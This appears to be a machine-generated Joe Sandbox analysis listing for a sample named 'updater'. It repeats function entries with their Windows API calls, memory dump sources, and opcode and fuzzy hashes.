Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 3e9e87dc77ec28d5f6694b7265c11d0f5888a570dbff0372cd43bcb7d71dca04
Instruction ID: 64b4526b695d673ddbcb733edf224812d05c3ecd0b102cb1d2422c4f0a4153b7
Opcode Fuzzy Hash: 3e9e87dc77ec28d5f6694b7265c11d0f5888a570dbff0372cd43bcb7d71dca04
Instruction Fuzzy Hash: C2011971004B408FF7329B79C48C7A2BBE0AB4432AF04C96DD2DA459A0E3B9A488CF04

Uniqueness

Uniqueness Score: -1.00%

Function 013B4699 Relevance: 4.5, APIs: 3, Instructions: 16COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000004,00000004,00000000,013B4737,?,?,?,?,?,013B46CC), ref: 013B46A1
GdiplusShutdown.GDIPLUS(00000000,?,?,?,?,?,013B46CC), ref: 013B46AE
LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,013B46CC), ref: 013B46B8

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterGdiplusLeaveShutdown
String ID:
API String ID: 3929762956-0
Opcode ID: d102b7521eb5a7ff5a2f0dd90d11b4695263f47f1ff637c5d77aba955f34e17d
Instruction ID: ecb3eea18559f2bdd119fea394e12fe3b53ef75b31c04fc6176a1cfab9535821
Opcode Fuzzy Hash: d102b7521eb5a7ff5a2f0dd90d11b4695263f47f1ff637c5d77aba955f34e17d
Instruction Fuzzy Hash: ECD09EBA000110DBD7321F18F8497EAB7F9EB85727F11491DF5D291068D7B41886DB64

Uniqueness

Uniqueness Score: -1.00%

Function 014281CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 01428201

Strings

, xrefs: 01428246

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: f910cad912491b27c9395598880c7f9872ca77a1d0d1ea6282a825b5223466ae
Instruction ID: bc06350a0a5a3a9d05cf7bb676ebb8b7a78a7c6c016708835e16a94d2c3121b3
Opcode Fuzzy Hash: f910cad912491b27c9395598880c7f9872ca77a1d0d1ea6282a825b5223466ae
Instruction Fuzzy Hash: 8141AE705042699BDB218F18CD84BFF7BFDAB16304F9804AED5CA87162D27199C5CB30

Uniqueness

Uniqueness Score: -1.00%

Function 0141FE67 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 0141FEA7

Strings

InitializeCriticalSectionEx, xrefs: 0141FE77

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 2e73839bcde26f73ea1be5dc8a3a81e5d773cbe39b8e37b992ad94c9e10d294f
Instruction ID: d038bc4d6c995496d15397509afe7569c6ff8284dace20079c9101f9c740502d
Opcode Fuzzy Hash: 2e73839bcde26f73ea1be5dc8a3a81e5d773cbe39b8e37b992ad94c9e10d294f
Instruction Fuzzy Hash: F6E09232580228BBCF212F92DC05D9E7F16DB64BB1B004016FD0815134C7B68927ABC0

Uniqueness

Uniqueness Score: -1.00%

Function 0141FC12 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0141FC46

Strings

FlsAlloc, xrefs: 0141FC22

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 0a1095d68f20b1a096c7d7b7532e6af5efbe4b77d5b670999688262684f8b497
Instruction ID: 85479378741f723dc8471464f8c13fb3a8cdac4bbdff1f0f9fe61ed95de69e72
Opcode Fuzzy Hash: 0a1095d68f20b1a096c7d7b7532e6af5efbe4b77d5b670999688262684f8b497
Instruction Fuzzy Hash: 2FE02B72AC022473C3213692EC0AD5EBD4BDFA8BB2F154017FD085223CDAB5091756D1

Uniqueness

Uniqueness Score: -1.00%

Function 01428564 Relevance: 3.2, APIs: 2, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 014280F9: GetOEMCP.KERNEL32(00000000,0142836B,?,?,01413E8D,01413E8D,?), ref: 01428124

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,014283B2,?,00000000,?,?,?,?,?,?,01413E8D), ref: 014285C2
GetCPInfo.KERNEL32(00000000,014283B2,?,?,014283B2,?,00000000,?,?,?,?,?,?,01413E8D,?), ref: 01428604

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: a0e45c004e3f41683436aa8dcd84faccbf068fe93315463ce12671dc949fa0b7
Instruction ID: 1c23baa313c4f083bfe3905f3729fe1118017d09523504ffdd5edf522bf6c283
Opcode Fuzzy Hash: a0e45c004e3f41683436aa8dcd84faccbf068fe93315463ce12671dc949fa0b7
Instruction Fuzzy Hash: 145114709002679EDB318F6AC844ABFBBE5EF61204F98452FD18A87272D77595C6CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01428350 Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 014280F9: GetOEMCP.KERNEL32(00000000,0142836B,?,?,01413E8D,01413E8D,?), ref: 01428124

_free.LIBCMT ref: 014283C8

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b23e38ce20d40e11b5ac2fbf25d4d2d8959d1146f1dea0eb4a6ed694448b28f1
Instruction ID: d7b2afbfdd2d167d758c46186d19be6d508f108271d8e70273a157153f396995
Opcode Fuzzy Hash: b23e38ce20d40e11b5ac2fbf25d4d2d8959d1146f1dea0eb4a6ed694448b28f1
Instruction Fuzzy Hash: 2031AF7290026AAFDB02DF6DD840AAF7BF4EF54324F51406BE910972B1EB72D990CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013D35EE Relevance: 3.1, APIs: 2, Instructions: 92fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013D2F5C: GetVersionExA.KERNEL32(?), ref: 013D2F80

CreateFileW.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 013D366D
CreateFileA.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 013D3675

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CreateFile$Version
String ID:
API String ID: 1715692615-0
Opcode ID: cb64873c1e395570a702aca99a4043fa04038b050c035fceef19f363cdda5b5d
Instruction ID: 5894ef08bbd3647ba9a7fafa2fcbe69b3ea8aa4276abb2e8a08cb6e7161da050
Opcode Fuzzy Hash: cb64873c1e395570a702aca99a4043fa04038b050c035fceef19f363cdda5b5d
Instruction Fuzzy Hash: BA21B4B3A00206ABEB119F7CEC41B9E7BB5BF44668F144529E565EB2D0DB748C408B91

Uniqueness

Uniqueness Score: -1.00%

Function 013B2BF0 Relevance: 3.1, APIs: 2, Instructions: 70COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_open@12.LIBCPMT ref: 013B2C5F
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013B2C73

Part of subcall function 013F60E6: FindNextFileW.KERNEL32(?,?,?,013B2C78,?,?,?,?,?,?,?,?,00000000), ref: 013F60EF

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: FileFindNext___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
String ID:
API String ID: 1204997319-0
Opcode ID: ff0e21d8fc0a73eb5c8f9dcf57842096bde73ae152feea2a97b27fc9eaa41519
Instruction ID: 755b9c1d5bb9fc755049048837b0ce2a9f44e6670df8e847c199b3ee91451b51
Opcode Fuzzy Hash: ff0e21d8fc0a73eb5c8f9dcf57842096bde73ae152feea2a97b27fc9eaa41519
Instruction Fuzzy Hash: 4E21367161020AAFDF15AFD8D9C0ADF77F4AF1831CF00461AEA02E7951E770E9408B90

Uniqueness

Uniqueness Score: -1.00%

Function 013CBB72 Relevance: 3.1, APIs: 2, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?,?,?,00000000), ref: 013CBBCB
RegGetValueA.KERNEL32(?,00000000,?,00000002,00000000,00000000,00000100,?,?,00000000,00020019,?,?,?,00000000), ref: 013CBBF1

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: OpenValue
String ID:
API String ID: 3130442925-0
Opcode ID: 956fa6178da3cbb146ee5d18100387a533566c57c2b465d0c72e794edefccf3f
Instruction ID: 114749ab49367cf68c243037f700267d5e07a5cb29317689ec17b8102d770ac0
Opcode Fuzzy Hash: 956fa6178da3cbb146ee5d18100387a533566c57c2b465d0c72e794edefccf3f
Instruction Fuzzy Hash: 4B21607164030AAFEB24DF58DC91BEEB7B8EB98B48F10412EF502A6191D7F49D44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013B799D Relevance: 3.0, APIs: 2, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 013B79E0

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 107a46bae4dc1d4eb999375325ee4bcd35cb79a88028c3a730045a30a5f87964
Instruction ID: 57eb6999889a78596279e36c52b2efe76d43b42230dabb140768162f9b66452b
Opcode Fuzzy Hash: 107a46bae4dc1d4eb999375325ee4bcd35cb79a88028c3a730045a30a5f87964
Instruction Fuzzy Hash: 030184B16047449EF3618A7C8884BB6BBECEB85214F10493EF796D3B91F770A9409710

Uniqueness

Uniqueness Score: -1.00%

Function 013F6087 Relevance: 3.0, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 013F6094
GetLastError.KERNEL32 ref: 013F60A7

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ac2e1ad40a287c84e4dfc2d75d955cf2565b796416f1e9b885d42fe84ff9d1e
Instruction ID: 5762f3c99f1698355e90aff4a8159dc957295d6dc759dfd90dc14b1d897a59c8
Opcode Fuzzy Hash: 7ac2e1ad40a287c84e4dfc2d75d955cf2565b796416f1e9b885d42fe84ff9d1e
Instruction Fuzzy Hash: DCF0FC70B0411D6BDF114A5CCD41ADE7ABD9B5425CF208139EA00A2246DF71D8418390

Uniqueness

Uniqueness Score: -1.00%

Function 0141D57C Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0141D5C4

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b3456a567b5ad2947e4a4420ad3c012ab4c8eecd648aec3ac7464743df77aff6
Instruction ID: e1d5cc39195573c3090b5ac450193ec7b4dac24851f6eb7113a6f8b75878ac86
Opcode Fuzzy Hash: b3456a567b5ad2947e4a4420ad3c012ab4c8eecd648aec3ac7464743df77aff6
Instruction Fuzzy Hash: 65E065B3A0663245E725667F7C4876A15C98BB1239F25022BE4248A1FEEE7485C25191

Uniqueness

Uniqueness Score: -1.00%

Function 013B2F83 Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013B2F8F

Part of subcall function 013F60E6: FindNextFileW.KERNEL32(?,?,?,013B2C78,?,?,?,?,?,?,?,?,00000000), ref: 013F60EF

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013B2FA1

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ___std_fs_directory_iterator_advance@8$FileFindNext
String ID:
API String ID: 478157137-0
Opcode ID: 2b0e29ceb34528c5d78f59bbb15759e657e3eea70d7cfd01a994688803db12ea
Instruction ID: 0dff2d8fc68881dd012f73e7c09aabcb5774b3216c345e8da78037d97e071452
Opcode Fuzzy Hash: 2b0e29ceb34528c5d78f59bbb15759e657e3eea70d7cfd01a994688803db12ea
Instruction Fuzzy Hash: 51E086311081067AEF016A1ADD858EF7B7AAFE125C7508124FF0596E51F731F8759790

Uniqueness

Uniqueness Score: -1.00%

Function 013F5D67 Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CopyFileW.KERNEL32 ref: 013F5D77
GetLastError.KERNEL32(?,?,?,013F6070,?,?,00000000,4350CDAC), ref: 013F5D8D

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CopyErrorFileLast
String ID:
API String ID: 374144340-0
Opcode ID: 16f63db432ac8c8fd4007c63c02e78847a849f262fdff744bae6db5526b1d271
Instruction ID: cc59ee62270cd2ad08a2c33e437902933eba2c86052104c818762fd7780eb0ec
Opcode Fuzzy Hash: 16f63db432ac8c8fd4007c63c02e78847a849f262fdff744bae6db5526b1d271
Instruction Fuzzy Hash: 8AE04F70604149FFEB018BA5D808F6E7FA99B1524AF088058B94485194DA74D5419770

Uniqueness

Uniqueness Score: -1.00%

Function 0141114B Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01411169
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 01411174

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 014cca33ebe9859562d65797585212fa86ffbd5e7bacd1e1bf1f81cfdba14264
Instruction ID: 2ed30d78d03d8fce545a8e40ca9a2664995bb5039aa8baf165b3d083fd5f37d8
Opcode Fuzzy Hash: 014cca33ebe9859562d65797585212fa86ffbd5e7bacd1e1bf1f81cfdba14264
Instruction Fuzzy Hash: CED022B1A89702040E1423FEA800C9F77A1693AEF0370038FCB20C9AFEEFF18000A152

Uniqueness

Uniqueness Score: -1.00%

Function 013EBE05 Relevance: 1.7, APIs: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 013D08C1: EnterCriticalSection.KERNEL32(?,00000000,?,013D04FE,01454914,013D0630,00000007,?,?,?,?,013D0374,?), ref: 013D08C9
Part of subcall function 013D08C1: GetCurrentThreadId.KERNEL32(?,013D04FE,01454914,013D0630,00000007,?,?,?,?,013D0374,?), ref: 013D08CF

_strlen.LIBCMT ref: 013EC011

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalCurrentEnterSectionThread_strlen
String ID:
API String ID: 1501162294-0
Opcode ID: cdeb58162763d7036b6a70d86c2b80afe500b046ecb662082dc1784ceb19b43d
Instruction ID: 03b1d58f7cc758e3c4deb375fa74f64509669f7a78f7c534e83998a5e5a34556
Opcode Fuzzy Hash: cdeb58162763d7036b6a70d86c2b80afe500b046ecb662082dc1784ceb19b43d
Instruction Fuzzy Hash: 2271C73290032AEBDF16DF6DD8846BEBBF4EF55228F104029E914A7285D735D945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 013B8E25 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 013B8E85

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: e983aa1a03757e7a0493d8ecfb2d83940b11ad08b4fb9b4f7b2f1c4c000d0c7c
Instruction ID: 0d92707a47afa0ed1c85957eb812a22c3dc6646b0a634fffe5a981917bcb639d
Opcode Fuzzy Hash: e983aa1a03757e7a0493d8ecfb2d83940b11ad08b4fb9b4f7b2f1c4c000d0c7c
Instruction Fuzzy Hash: CE21C57194530AEBDB10EFA9D880ADEBBB9FF64A04F10046FF505A7640E7715A098B91

Uniqueness

Uniqueness Score: -1.00%

Function 013CF518 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 013CF58A

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 06d55f0090a365e7cf1a2ee48323d961df7079bd84090b7898b360519a70f18c
Instruction ID: 735c433c4ad761427b41e14d879a47c1cacf83153dfe4e0e1e33022d650fa3ee
Opcode Fuzzy Hash: 06d55f0090a365e7cf1a2ee48323d961df7079bd84090b7898b360519a70f18c
Instruction Fuzzy Hash: 2511D5B1900345AFC715DF69884099EBBBEEF95208F2444ADE4149B342D631DE02CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0141FA7F Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd69b30f2fed49e15bc4d09106a77f9a31e43624eb26d19c9be718efe1f3845
Instruction ID: d227fdb2d451c16124b6644400fcd7319dcd4bf27520d3d7436e0bcb6bc417e2
Opcode Fuzzy Hash: 4cd69b30f2fed49e15bc4d09106a77f9a31e43624eb26d19c9be718efe1f3845
Instruction Fuzzy Hash: 5701F5373102119FAF26CD2DEC8095B379BABC46A07244122FB04DB2ADDA34D80E8790

Uniqueness

Uniqueness Score: -1.00%

Function 013B7B49 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 013B7BB4

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

